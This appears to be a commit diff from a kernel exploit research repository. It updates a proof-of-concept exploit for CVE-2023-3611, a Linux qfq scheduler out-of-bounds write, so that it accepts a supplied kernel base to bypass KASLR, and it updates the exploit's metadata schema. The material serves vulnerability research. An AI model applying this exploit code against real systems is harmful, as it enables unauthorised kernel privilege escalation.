Update to v3 schema and add option to read kernel base from args

google · Sep 18, 2023 · 37ed654 · 37ed654
1 parent b4a416f
commit 37ed654
Show file tree

Hide file tree

Showing 2 changed files with 20 additions and 9 deletions.
diff --git a/pocs/linux/kernelctf/CVE-2023-3611_lts_mitigation/exploit/mitigation-6.1/exploit.c b/pocs/linux/kernelctf/CVE-2023-3611_lts_mitigation/exploit/mitigation-6.1/exploit.c
@@ -935,13 +935,24 @@ int bug_worker(void* arg) {
   }
 }
 
-int main() {
+int main(int argc, char* argv[]) {
   // main orchestration routine.
 
   // Hopefully less noise due to thread creation
   FAIL_IF(_pin_to_cpu(1) != 0);
 
-  FAIL_IF(get_kernel_base() < 0);
+  if (argc == 2) {
+    u64 base = strtoull(argv[1], NULL, 16);
+    L("using supplied kernel base: %llx", base);
+    u64 diff = base - 0xffffffff81000000ull;
+    L("diff: %llx", diff);
+
+    #define __x(name) { name += diff; L("corrected %s to %p", #name, (void*)name); }
+    FOR_ALL_OFFSETS(__x);
+    #undef __x
+  } else {
+    FAIL_IF(get_kernel_base() < 0);
+  }
 
   payload = mmap(NULL, 0x4000, PROT_READ | PROT_WRITE, MAP_ANON | MAP_PRIVATE, -1, 0);
   FAIL_IF(payload == MAP_FAILED);

diff --git a/pocs/linux/kernelctf/CVE-2023-3611_lts_mitigation/metadata.json b/pocs/linux/kernelctf/CVE-2023-3611_lts_mitigation/metadata.json
@@ -1,5 +1,5 @@
 {
-    "$schema": "https://google.github.io/security-research/kernelctf/metadata.schema.v2.json",
+    "$schema": "https://google.github.io/security-research/kernelctf/metadata.schema.v3.json",
     "submission_ids": ["exp55"],
     "vulnerability": {
         "summary": "qfq_change_agg() function in net/sched/sch_qfq.c allows an out-of-bounds write because lmax is updated according to packet sizes without bounds checks.",
@@ -14,18 +14,18 @@
             ]
         }
     },
-    "exploits": [
-        {
+    "exploits": {
+        "lts-6.1.35": {
             "environment": "lts-6.1.35",
             "uses": ["userns"],
-            "requires_seperate_kaslr_leak":false,
+            "requires_separate_kaslr_leak": false,
             "stability_notes": "30-50% success rate"
         },
-        {
+        "mitigation-6.1": {
             "environment": "mitigation-6.1",
             "uses": ["userns"],
-            "requires_seperate_kaslr_leak": true,
+            "requires_separate_kaslr_leak": true,
             "stability_notes": "5% success rate"
         }
-    ]
+    }
 }